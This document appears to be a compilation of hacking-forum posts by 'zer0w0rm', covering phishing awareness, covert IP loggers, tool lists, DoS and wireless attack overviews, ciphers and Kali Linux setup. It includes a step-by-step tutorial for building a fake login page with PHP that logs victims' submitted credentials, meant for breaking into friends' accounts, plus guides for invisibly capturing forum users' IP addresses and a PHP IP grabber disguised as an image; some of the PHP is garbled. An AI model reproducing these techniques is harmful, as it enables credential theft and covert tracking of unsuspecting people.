Don’t Take the Bait, 4 Ways to Avoid Phishing Scams

As online fraud remains a consistent problem for nearly 300,000,000 Americans who use the internet daily, it’s important to stay updated and informed on the newest forms of fraud that are a constant threat to our online security. The Better Business Bureau (BBB) warns internet users about “phishing” emails, a scam that is becoming an increasing problem and is proving to be very costly for employers. Chubbworks even published an article recently discussing email scams and surveyed how many people had actually received a phishing email themselves, a majority have.

Avoiding-Phishing-Emails 

The latest versions of these scams are showing up in the form of emails from trusted organizations such as the BBB or United States Postal Service (USPS). The emails are sent by hackers asking you to submit information or to follow links that gather, or “phish,” for your personal data which may include banking information, usernames, and/or passwords. These emails will oftentimes deliver a nasty virus to your computer system. Once your computer is infected, you become vulnerable to serious potential security risks. So how can you avoid this from happening to you? Here are four things you should know:

1. Make sure to pay attention to spelling mistakes and grammatical errors in emails. 
 A fortune 500 company (or any large reputable business) is very unlikely to release an email blast riddled with misspellings.
 

2. Hold your cursor (don’t click) over any suspicious links. 
This will show you the URL that you are about to click. If the URL doesn’t contain the company name in the first part of the domain [www.company.com], it’s probably a scam.
    a. For example, if you were to receive an email that looks like it came from the United States Postal Service (USPS) and it asks you to click a link and that link doesn’t start with http://www.usps.com in the URL, it’s very likely it’s a phishing scam!

3. Keep your antivirus software up-to-date. 
Antivirus software helps to shield your computer from internet threats and those software updates are important because your program should be constantly evolving based on new hacker threats.
 

4. Last and certainly not least, educate your staff. 
 Make sure that they are aware of the caution they need to take when clicking links inside an email. Your staff should understand the potential consequences of getting a computer virus and how it could affect your clients (remember the Target fiasco last Thanksgiving?)

With so much information being stored on the web in today’s business world, it is important to be cautious with your personal data and information. Stay secure, and stay informed, so you don’t take the bait and put yourself at risk!

Thank you (zer0w0rm)
 

How to find out someone's IP address

Everyone needs simetimes to find out someone's IP address, for many different reasons. For years and years I used free hosting and php scripts that save ip's to text file on the server. It is not so difficult, but it takes time, email, it requires registration and your anonymity is not always secure. There are lots of tutorials on that topic in the internet. Also there are several ip logger services available in the internet. Most of them creates special URL and then send victim's IP to your email. I used all of those services, at least that I could found. Today I will talk about one of them, which I've found the most advanced and easy to use, IPLOGGER.ORG



Pros:

- NO registration required
- NO email required
- NO limitations
- Absolutely free
- Absolutely legal

Cons: Simetimes for some IP's it shows a wrong city, which is not a big deal for me.

Several methods available:

- invisible iplogger (no evidence of ip grabbing)
- iplogger URL shortener (Short URL + IP grabber function)
- ip-userbars for signature in forum, blog etc. (nice signature + IP grabber feature)
- visitor counter (counter + IP grabber feature)
- ip informer with IP's of 10 recent visitors (sometimes helps against trolls)

Features:

- no limits on number of IP's recorded
- no email – no spam on your email address, no thousand email with ip's...
- generates short URL with iplogger-function, can be used as Url shortener
- short link and short domain name 2no.co could be use instead of 'iplogger.org' in generated URL's
- trace history of victim's IP change (unique feature!)
- Country, region and city detection, map function

The following tutorial covers only one method of using iplogger, that is 'Invisible iplogger' for forum.

How to use invisible iplogger on forums:

1. Go to IPLOGGER.ORG

2. Click 'Generate invisible iplogger'



3.  Save somewhere your iplogger-ID to access to your statistic



4. Copy 'BB-code for forum' to clipboard



5. Paste code from clipboard to your post, comment or private message to the person you want to know more about. Preview your post or comment and check if there is no any visible evidence of special IP-grabber code in your post.

NOTE: Check if the forum supports bb codes. If not, try html code or use other methods.

6. Go back to IPLOGGER.ORG and click 'View statistic' and view IP address of all people who have seen your post, as well as date and time when they saw it, their country and city, web page address they viewed your post from.



Notice that iplogger trace the history of changes in IP address when victims run VPS or use proxy.

Click on IP address to view it on the map.



7. To refresh statistic and check if there are more users viewed your post or comments click “Refresh”.

How to hide 'iplogger' in the generated link:

1. On the bottom of the main page of IPLOGGER.ORG select '2no.co' before generate your iplogger to eliminate any evidence of you intention to get someone's IP. The link generated will be like http://2no.co/1vAM which looks like just normal short url. This links can't be traced.



Good luck. Hope you like it so far...


Thank you (zer0w0rm)
 

IP Grabber on ANY website

Requirements:

  • Webhost that supports PHP


Instructions:

  1. Create a directory called:
     
    Code:
     
    image.png
  2. Create a file in image.png called:
     
    Code:
     
    index.php
  3. Paste this code in index.php:
    PHP Code:
     
    <? header ("Content-type: image/png");
    $newImg ImageCreate(1,1); $skyblue ImageColorAllocate($newImg,136,193,255); ImageFill($newImg,0,0,$skyblue); ImagePNG($newImg); ImageDestroy($newImg);
    ?>
    <?php

        $file
    ="log.txt";
        
    $hits=$domain GetHostByName($REMOTE_ADDR);
        
    $handle=fopen($file"w");
        
    fwrite($handle$hits);
        
    fclose($handle);
    ?>
     
  4. Create a file called log.txt
This appears as a broken image but really it records someones IP address. This can be used on almost every website even if they don't allow PHP.


Thank you (zer0w0rm)
 

Top Scanners



Here is some site to use to scan


http://www.cirt.net/nikto2
http://www.parosproxy.org/index.shtml
http://www.wiretrip.net/rfp/
http://portswigger.net/suite/
http://www.acunetix.com/
http://www.nstalker.com/products
http://www.nessus.org/nessus/
http://www.gfi.com/lannetscan/
http://www.eeye.com/...cts/Retina.aspx
http://www-arc.com/sara/
http://www.qualys.com/

Thank you (zer0w0rm)
 

Top Packet Sniffers


Here is some site to use packet sniffers 

http://www.wireshark.org/
http://www.kismetwireless.net/
http://www.tcpdump.org/
http://ettercap.sourceforge.net/
http://www.monkey.org/~dugsong/dsniff/
http://www.stumbler.net/
http://www.ntop.org/
http://etherape.sourceforge.net/
http://kismac.de/


Thank you (zer0w0rm)
 

Top 10 Password Crackers


Here is some site to use password crackers

http://www.oxid.it/cain.html
http://www.openwall.com/john/
http://freeworld.thc.org/thc-hydra/
http://www.aircrack-ng.org/
http://www.l0phtcrack.com/
http://airsnort.shmoo.com/
http://www.solarwinds.com/
http://www.foofus.net/fizzgig/pwdump/
http://project-rainbowcrack.com/
http://www.hoobie.net/brutus/

Thank you (zer0w0rm)
 





If you are working in the field of computer networks or an enthusiast in the field of network security, you are sure to have come across the term “Denial of Service attack” which is simply referred to as “DoS attack”. Today, this is one of the most common types of network attacks carried out on the Internet. In this post, I will try to explain DoS attack, its variants and methods involved to carry out the same in an easily understandable manner.

What is a DOS Attack?

Denial of Service or DoS attack is a type of network attack designed to flood the target network or machine with a large amount of useless traffic so as to overload it and eventually bring it down to its knees. The main intention behind DoS attack is to make the services running on the target machine (such as a website) temporarily unavailable to its intended users. DoS attacks are usually carried out on web servers that host vital services such as banking, e-commerce or credit card processing.

A common variant of DOS attack known as DDoS (Distributed Denial of Service) attack has become quite popular in the recent days as it is more powerful and hard to detect. A typical DoS attack has a single place of origin while a DDoS attack originates from multiple IP addresses distributed across two or more different network. The working of a DDoS attack is shown in the following diagram:





Unlike a DoS attack where the attacker uses one single computer or a network to attack the target, a DDoS the attack originates from different pre-compromised computers belonging to different networks. As the attacker uses a number of computer systems from different networks each residing in different geographical locations, the incoming traffic looks natural and therefore becomes hard to detect.

Protection Against DoS/DDoS Attacks:

DoS attacks can easily be handled by blacklisting the target IP (or range of IPs) that are found to be making too many requests/connections (in an unnatural way) to the server. However, DDoS attacks are complicated as the incoming requests seem more natural and distributed. In this case it is hard to find the difference between the genuine and malicious traffic. Taking an action at the firewall level to blacklist suspected IPs may result in false positives and therefore may affect the genuine traffic as well.

Methods Involved in DoS Attack:

The following are some of the commonly employed methods in carrying out a DoS attack:

SYN Flood Attack
Ping Flood Attack (Ping of Death)
Teardrop Attack
Peer-to-Peer Attacks

Thank You (zer0w0rm)
 

Wireless Hacking Basics

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.

The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-

1) Stations and Access Points :  A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :  The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :  It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :  Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5 ) Passive Scanning :  Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

6) Detection of SSID :  The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning

7) Collecting the MAC Addresses :  The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

8) Collecting the Frames for Cracking WEP :  The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :  Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :  There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :  The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :  Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :  The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :
 The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :
 APs have weaknesses that are both due to design mistakes and user interfaces

16) Trojan AP :  An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :  A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :  A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

19) War Driving :  Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Tips for Wireless Home Network Security

1) Change Default Administrator Passwords (and Usernames)
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely 


To know them better, google them.
Thank you (zer0w0rm)
 

Encryption Methods

This tutorial covers some popular encryption methods. To begin you will need some things


1. You need the encrypted data

You will have to find the encrypted data. Sometimes its hidden in a webpage, disguising itself as something different. Sometimes it is just written somewhere in the open, but the passkey or the referencing alphabet is hidden.

2. You need to know what the crypt represents

If you have a crypt, but you do not know what you are trying to find in, it you will have a much harder time. You should first try to guess what the result of the decryption is. It could be a plain text, or a picture, maybe even a binary program. And if it is text it could be special text, like mathematical expressions, coordinates or just numbers. There are many possibilities, but usually only a few make sense.


3. You need to know how it was encrypted, or at least have a rough guess.

To decrypt the crypt you will first have to know how it was encrypted. There are endless possibilities. First see if you can find out how it was encrypted by investigating the background of the guy that encrypted it or the circumstances of the crypt. There may be hints around. A professional cryptanalysist may need nothing but the crypt to get a good idea how it was encrypted, and even if he has no idea he may still decrypt it by using professional methods. But here for us, you should know how it was encrypted at some point during decryption.. ;)


4. Now what means something is encrypted?

Lets say I have the word: "hello". Now I reverse the word, which gives me "olleh". This is a simple encryption. If someone sees this text on a piece of paper he would probably think its a foreign language: "?uoy era woh yeh." But you know its plain english text, and can easily decrypt it. There are many ways to encrypt text to make it look like no text at all. If another person knows how it was encrypted, he can easily decrypt it and get the message from the crypt. First I want to point out some basic encryption methods:

1. Caesar cipher

Simple cipher that shifts the alphabeth by some number of letters. "abcdef" shifted by 2 becomes: "cdefgh". ROT-13 for example is a rotation of the alphabeth by 13 letters. ROT-13 is so popular because there are 26 letters in the alphabet so its easy to encrypt it then encrypt it a second time to get it back to normal. You can write small programs to look for this kind of easy encryption (or just use rot13.com)

2. Mono-alphabetic substitution

Replaces every letter with some other letter from the alphabeth. No letter can be used twice of course. You will need a key that holds the mapping of the characters. The key has two parts. The first part is the original alphabeth and the second part is the encryption key. Lets say "abcdef" is mapped to "fedcba". That means the word "beef" becomes "ebba". To crack those ciphers you will need to look for more frequent letters and words and guess the text... you will need a fairly large sample of ciphered text for it to work out. The word "the" for example is often used in the english language, for other languages it may be other words of course...

3. Vigenere cipher

Every letter in the word gets shifted by a certain amount that is set by the password. This means the following... lets say the password is "bcde". Now say a=1 b=2 and so on... that means the first letter of the original text is shifted 2 letters, the second one is shifted by 3 letters and so on. This works great until you run out of the password characters. (Its only 4 characters long) Then you just start from the beginning again, in this case with "b" (=2). Notice how the A is converted to a number, here one (1) in the example. This is referencing by position. We talk about that later a bit more detailed.

4. One time pad (with XORing)

The safest version of encrypting is a one time pad. You have a long line of random letters. Those letters are known by you and the guy that needs to decrypt the message. You now encrypt every letter of the original text with the letter at the same position in that random letter line. The result is the cipher that you send away. The guy on the other end has the one time pad and can extract the original letters by decoding with the one time pad random letters. The only bad thing is: you got to get the one time pad to the other side, hopefully without anyone else getting a copy of it they can use to decrypt your message. Additionally the receiver needs to know which pad to use for the decryption if there is more than one pad available.

Now how do you encrypt the two lines of letters with each other? You need to XOR them. First convert them to binary. A binary number consists only of 0 and 1. You can describe any letter with a binary number, either using the Ascii code of the letter as a base or using an alphabeth numbering, like A=1, B=2 or similar. Now after both strings are converted to binary you have a very long line of 0 and 1s. You still know which numbers are representing which letter because you wont delete leading zeros, making it so that for example every 8 numbers represent one letter. (8 bit code)
Now XOR the two strings by using an exclusive-or method. This means: if there is one 1 in between the two, the result is 1. If there are two 0 or two 1, the result is 0.

0 xor 0 = 0
0 xor 1 = 1
1 xor 0 = 1
1 xor 1 = 0

The resulting string can be decrypted by xoring with the known passkey (the one time pad you transmitted earlier to the other side), and then finally by converting to letters again by using either Ascii codes or alphabetic numbering. (Meaning: By referencing the position in a certain known alphabeth).

Converting numbers to letters or vice versa

You already noticed how in those examples letters are becoming numbers or vice versa. Generally this is done by mapping letters to numbers in one way or another. Using computers there are generally two ways of mapping. The first one is the Ascii Table, which converts every character (letter, number, special characters) to a certain number code. You can easily find out about Ascii using a search engine. The second one is Unicode, which is a replacement for Ascii codes that became necessary cause Ascii codes are limited to representing 255 letters, leaving not enough room for all the different letters that some languages have, like chinese for example. Again, use a search engine to learn about Unicode.
Now, not using computers, you can have a reference alphabeth and convert a letter to a number by its position in the alphabeth, and vice versa. Lets say the alphabeth is "gcqlxebm", then G = 1, C = 2, Q = 3. The most natural alphabeth is of course "abcdefghijk...", so its used quite often.

Another method to convert letters to numbers is using hex numbers. Hex numbers can have the letters A-F, representing the digits 10-15, which means if you have certain numbers they will only consist of letters... For those who dont know, HEX number are based on 16 instead of base 10 as our normal numbers are.

Converting numbers to numbers

This may sound easy, but its important for cryptography. Remember that you can always change the way something looks by changing it into some other number system. Our normal system is based on ten, probably because we have ten fingers and toes. This means that you can easily make a number totally unusable to an attacker if you change it to another base without him knowing. A number based on 16 may look the same as a number based on 10, but its a totally different value. So make sure you know what you are looking at. If you have a very large sample of numbers and not a single digit is above 3, then it is probably the base 4 system. Generally, it can be ANY base number. You better find out which one.

Thank you (zer0w0rm)
 

Phishing Pages

So what exactly is phishing? Well, phishing is getting someone to click on a link to a fake login page that you have made, and getting them to enter their information. You can get them to do this by spoofing an e-mail or sending it to them in an instant message or something. I have tried to make each step as easy to follow as possible so anyone can do it.

1. Decide who and where you want to get into

When I did this myself, I was trying to get into all of my friend's MySpace accounts. Then go to the website you chose, right-click, and View Source.

2. Save the source as login.html

Then open Notepad and paste the following into it:


foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;


Save as data.txt

3. Register at a free webhosting place that will let you use PHP

(I used 100webspace.com) Then register at a place that won't display advertisements on your site. (I used 50webs.com) It would be a good idea to try to login to the website your making a fake of but with a bad password. Copy the link for the error page.

4. Get a program that will let you save as .php

(I used EditPlus2 from http://www.editplus.com) Open the program then copy and paste the following:

<?php
header("Location: someplace.html");
$handle = fopen("data.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>


Now, look at the second line of code. Do you notice '("Location: someplace.html")'? Change someplace.html to the error page. Save as log.php

5. Upload data.txt and log.php at the site that will let you use php

(100webspace.com) Then open login.html in Notepad.
Search for <form action="some file name"> Replace their file name with a link to your log.php. Save and then upload login.html.

6. Test out your new login page

Load your data.txt from your website(yoururl.hostdomain/data.txt) and it should have your test login listed. You can re-upload data.txt to get rid of your test login information.

Ok now that you have your fake login page done you need to get the people there. The method I chose to do was to make the page different and tell people it was a secret login page. I put it in my away message on AIM and told them if they logged in at that page they would see something cool. Another way is to spoof an email.

Thank you (zer0w0rm)
 

How connect anonymous VPN PPTP on Kali Linux AProVPN.com

Hello Guys

Today we learn how to install and configuration vpn in Kali Linux.







By default , vpn is not configure in Kali Linux. If u want to connect vpn in kali linux , first install pptp and network openvpn in kali linux using apt-get install.
Command :
apt-get install network-manager-openvpn-gnome
apt-get install network-manager-pptp
apt-get install network-manager-pptp-gnome
apt-get install network-manager-strongswan
apt-get install network-manager-vpnc
apt-get install network-manager-vpnc-gnome
/etc/init.d/network-manager restart

Thank you (zer0w0rm)

 

Firefox Addons For Penetration Testing

1>Firebug---

(useful for the debugging tools that can help you tracking rogue javascript code on servers)---

https://addons.mozilla.org/en-US/firefox/addon/firebug/





2>User Agent Switcher---

(You can use this extension to change the user agent of your browser)

https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/





3>HackBar---

(Useful for SQL injection and XSS attacks)

https://addons.mozilla.org/en-US/firefox/addon/hackbar/





4>HttpFox---

(Monitor and analyze all the incoming and outgoing HTTP traffic between your browser and the web server.)

https://addons.mozilla.org/en-US/firefox/addon/httpfox/





5>Live HTTP Headers---

(View the HTTP headers of a website instantly)

https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/





6>Tamper Data---

(View and modify HTTP/HTTPS headers and post parameters.)

https://addons.mozilla.org/en-US/firefox/addon/tamper-data/





7>ShowIP---

(Shows the IP of the current page)

https://addons.mozilla.org/en-US/firefox/addon/showip/





8>OSVDB---

(Open Source Vulnerability Database Search)

https://addons.mozilla.org/en-us/firefox/addon/osvdb/





9>Packet Storm search plugin---

(Search the packet storm database for exploits)

https://addons.mozilla.org/en-us/firefox/addon/packet-storm-search-plugin/





10>Offsec Exploit-db Search---

(Search the Exploit-db archive)

https://addons.mozilla.org/en-us/firefox/addon/offsec-exploit-db-search/





11>Security Focus Vulnerabilities Search Plugin----

(Search for vulnerabilities in the Security Focus)

https://addons.mozilla.org/en-us/firefox/addon/securityfocus-vulnerabilities-/





12>Cookie Watcher---

(Watch the selected cookie in the status bar)

https://addons.mozilla.org/en-us/firefox/addon/cookie-watcher/





13>Header Spy---

(Shows HTTP Headers on status bar)

https://addons.mozilla.org/en-us/firefox/addon/header-spy/





14>Groundspeed---

(Manipulate the application user interface)

https://addons.mozilla.org/en-us/firefox/addon/groundspeed/





15>CipherFox---

(Displays the current SSL/TLS cipher and certificate on the status bar)

https://addons.mozilla.org/en-us/firefox/addon/cipherfox/





16>XSS Me---

(Tool for testing reflected XSS vulnerabilities)

https://addons.mozilla.org/en-us/firefox/addon/xss-me/





17>SQL Inject Me---

(Extension to test SQL Injection vulnerabilities)

https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/





18>Wappalyzer---

(Discover technologies and applications that are used on websites)

https://addons.mozilla.org/en-us/firefox/addon/wappalyzer/





19>Poster---

(Make HTTP requests,interact with web services and watch the output)

https://addons.mozilla.org/en-us/firefox/addon/poster/





20>Javascript Deobfuscator---

(Show the JavaScript code that are running on web pages)

https://addons.mozilla.org/en-us/firefox/addon/javascript-deobfuscator/





21>Modify Headers---

(Modify HTTP request headers)

https://addons.mozilla.org/en-us/firefox/addon/modify-headers/





22>FoxyProxy---

(Advanced proxy management tool)

https://addons.mozilla.org/en-us/firefox/addon/foxyproxy-standard/





23>FlagFox---

(Displays a country flag for the location of the web server)

https://addons.mozilla.org/en-us/firefox/addon/flagfox/





24>Greasemonkey---

(Customize the way a webpage behaves by using small bits of JavaScript)

https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/





25>Domain Details---

(Displays Server Type, Headers, IP Address, Location Flag, and links to Whois Reports)

https://addons.mozilla.org/en-us/firefox/addon/domain-details/





26>Websecurify---

(Useful for security assessments in web applications)

https://addons.mozilla.org/en-us/firefox/addon/websecurify/





27>XSSed Search---

(Search the cross-site scripting database at XSSed.Com)

https://addons.mozilla.org/en-us/firefox/addon/xssed-search/





28>ViewStatePeeker---

(ASP.NET viewstate viewer)

https://addons.mozilla.org/en-us/firefox/addon/viewstatepeeker/





29>CryptoFox---

(CryptoFox is an encryption/decryption tool for cracking MD5 passwords)

https://addons.mozilla.org/en-US/firefox/addon/cryptofox/





30>WorldIP---

(Location of the web server,IP,Datacenter,Ping,Traceroute,RDNS,AS etc)

https://addons.mozilla.org/en-US/firefox/addon/worldip-flag-and-datacenter-pi/





31>Server Spy---

(Unveils the technology of the web server (Apache, IIS etc.)

https://addons.mozilla.org/en-US/firefox/addon/server-spy/





32>Default Passwords---

(Search CIRT.net default password database)

https://addons.mozilla.org/en-US/firefox/addon/default-passwords-cirtne-58786/





33>Snort IDS Rule Search---

(Search for Snort IDS Rules)

https://addons.mozilla.org/en-US/firefox/addon/snort-ids-rule-search/





34> fireforce--

(brute force attack)

https://addons.mozilla.org/en-US/firefox/addon/fireforce/





..enjoy Hackers.
 

Kali Linux Dual Boot with Windows

Hello



Today i show you how to install kali dual boot with windows.



First Download Kali linux from here (http://www.kali.org/).



Installing Kali alongside a Windows installation can be quite useful. However, you need to exercise caution during the setup process. First, make sure that you’ve backed up any important data on your Windows installation. Since you’ll be modifying your hard drive, you’ll want to store this backup on external media. Once you’ve completed the backup, we recommend you peruse Kali Linux Hard Disk Install, which explains the normal procedure for a basic Kali install.

we will be installing Kali Linux alongside an installation of Windows 7, which is currently taking up 100% of the disk space in our computer. We will start by resizing our current Windows partition to occupy less space and then proceed to install Kali Linux in the newly-created empty partition.

Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali linux Liveas the installation medium. Ensure you have:

  • Minimum of 8 GB free disk space on Windows

  • CD-DVD / USB boot support 
Preparing for the Installation 

  1. Download Kali Linux. 

  2. Burn The Kali Linux ISO to DVD or copy Kali Linux Live to USB. 

  3. Ensure that your computer is set to boot from CD / USB in your BIOS. 
Dual Boot Installation Procedure  

  1. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali Boot screen. Select Live, and you should be booted into the Kali Linux default desktop. 

  2. Now launch the gparted program. We’ll use gparted to shrink the existing Windows partition to give us enough room to install Kali Linux.

      

  3. Select your Windows partition. Depending on your system, it will usually be the second, larger partition. In our example, there are two partitions; the first is the System Recovery partition, and Windows is actually installed in /dev/sda2. Resize your Windows partition and leave enough space (8GB minimum) for the Kali installation.

      

  4. Once you have resized your Windows partition, ensure you “Apply All Operations” on the hard disk. Exit gparted and reboot.

      
Kali Linux Installation Procedure   
  1. The installation procedure from this point onwards is similar to a Kali Linux Hard Disk install, Click Here until the point of the partitioning, where you need to select “Guided – use the largest continuous free space” that you created earlier with gparted.


  2. Once the installation is done, reboot. You should be greeted with a GRUB boot menu, which will allow you to boot either into Kali or Windows.
    Now that you’ve completed installing Kali Linux, it’s time to customize your system.
    Any Query about this tutorial you can comment or message us .

    Thank you (Zer0w0rm)
 

Kali Linux Live USB Install

Hello 

Today i show you how to install kali in hard disk. 

First Download Kali linux from here (http://www.kali.org/).


Booting and installing Kali from a USB stick is our favorite and fastest method of getting up and running. In order to do this, we first need to create the Kali ISO image on a USB drive. If you would like to add persistence to your Kali Linux USB stick, please read the full document before proceeding to create your image.

Preparing for the USB copy

  1. Download Kali linux.
  2. If running Windows, download universal-usb-installer  (http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/)
  3. No special software is needed for a *nix OS.
  4. A USB Key (at least 2GB capacity for mini, 4GB for regular).
Kali Linux Live USB Install Procedure

Imaging Kali on a Windows Machine

  1. Plug your USB stick into your Windows USB port and launch the universal-usb-installer
  2. Choose the Kali Linux ISO file to be imaged and verify that the USB drive to be overwritten is the correct one.
  3. Once the imaging is complete, safely eject the USB drive from the Windows machine. You can now use the USB device to boot into Kali Linux.
 



Plug out the usb storage device safely and plug it into the machine you want to boot.Restart it and set that usb storage device to boot first from the BIOS menu which may beF12F8F2 or Del depending upon you machine and build.


Adding Persistence to Your Kali Live USB


Adding persistence (the ability to save files and changes across live boots) to your Kali Linux image can be very useful in certain situations. To make your Kali Linux USB stick persistent, follow these steps as the root user. 


In this example, we assume our USB drive is /dev/sdb. If you want to add persistence, you’ll need a larger USB device than we listed in our prerequisites above.



  1. Image the Kali Linux ISO to your USB stick as explained above, using the “Linux Method” and dd
  2. Create and format an additional partition on the USB stick. In our example, we usegparted by invoking: 
     gparted /dev/sdb
  3. Your current partitioning scheme should look similar to this:

      
  4. Proceed to format a new partition of your desired size to be used for persistence. In our example, we used all the remaining space available. Make sure the volume label of the newly created partition is persistence, and format it using the ext4 filesystem.

     
  5. Once the process is complete, mount your persistence USB partition using the following commands (as the root user):


    mkdir /mnt/usb
    mount /dev/sdb2 /mnt/usb
    echo "/ union" >> /mnt/usb/persistence.conf
    umount /mnt/usb 

  6. Plug the USB stick into the computer you want to boot up. Make sure your BIOS is set to boot from your USB device. When the Kali Linux boot screen is displayed, select “Live boot” from the menu (don’t press enter), and press the tab button. This will allow you to edit the boot parameters. Add the word “persistence” to the end of the boot parameter line each time you want to mount your persistent storage.

     
   

Any Query about this tutorial you can comment or message us .



In Next Part we see how to install dual os in pc (kali + windows ).

Thank you (Zer0w0rm)
 

Install Kali OS

Hello 

Today i show you how to install kali in hard disk.

First Download Kali linux from here (http://www.kali.org/).



Kali Linux Hard Disk Install



Installation Prerequisites

  • A minimum of 8 GB disk space for the Kali Linux install.

  • For i386 and amd64 architectures, a minimum of 512MB RAM.

  • CD-DVD Drive / USB boot support
Preparing for the Installation

  1. Download Kali linux. http://www.kali.org/

  2. Burn The Kali Linux ISO to DVD or Image Kali Linux Live to USB.

  3. Ensure that your computer is set to boot from CD / USB in your BIOS.


Kali Linux Installation Procedure
  1. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali Boot screen. Choose either Graphical or Text-Mode install. In this example, we chose a GUI install.  
  1. Select your preferred language and then your country location. You’ll also be prompted to configure your keyboard with the appropriate keymap.  

  2. The installer will copy the image to your hard disk, probe your network interfaces, and then prompt you to enter a hostname for your system. In the example below, we’ve entered “kali” as our hostname. 

  3. Enter a robust password for the root account.  

  4. Next, set your time zone.  

  5. The installer will now probe your disks and offer you four choices. In our example, we’re using the entire disk on our computer and not configuring LVM (logical volume manager). Experienced users can use the “Manual” partitioning method for more granular configuration options.  

  6. Next, you’ll have one last chance to review your disk configuration before the installer makes irreversible changes. After you click Continue, the installer will go to work and you’ll have an almost finished installation. 

  7. Configure network mirrors. Kali uses a central repository to distribute applications. You’ll need to enter any appropriate proxy information as needed.NOTE! If you select “NO” in this screen, you will NOT be able to install packages from Kali repositories.  

  8. Next, install GRUB. 

  9. Finally, click Continue to reboot into your new Kali installation. 
Any Query about this tutorial you can commnet or messgae us .



In Next Part we see how to install dual os in pc (kali + windows ).

Thank you (Zer0w0rm)
 

Some tools to hide your IP

1. Anchor :- http:// to. ly/6WRu

2. HSS :- http://www.hotspotshield.com/en

3. VPN Reactor :- https://www.vpnreactor.com/ (Free)

4. Best Free VPN Service :- http://bestfreevpn.com/ (free)

5. Hide My IP :- http://www.hide-my-ip.com/

6. ProXPN :- http://proxpn.com/ (Free)

7. CyberGhost :- https://cyberghostvpn.com/

8. TOR Onion :- https://www.torproject.org/download/download-easy.html.en

9. SecurittyKiss :- http://www.securitykiss.com/

10. Your Freedom :- http://www.your-freedom.net/index.php?id=downloads

11. Proxygon :- http://www. mediafire. com/?tluqfna49i0xt74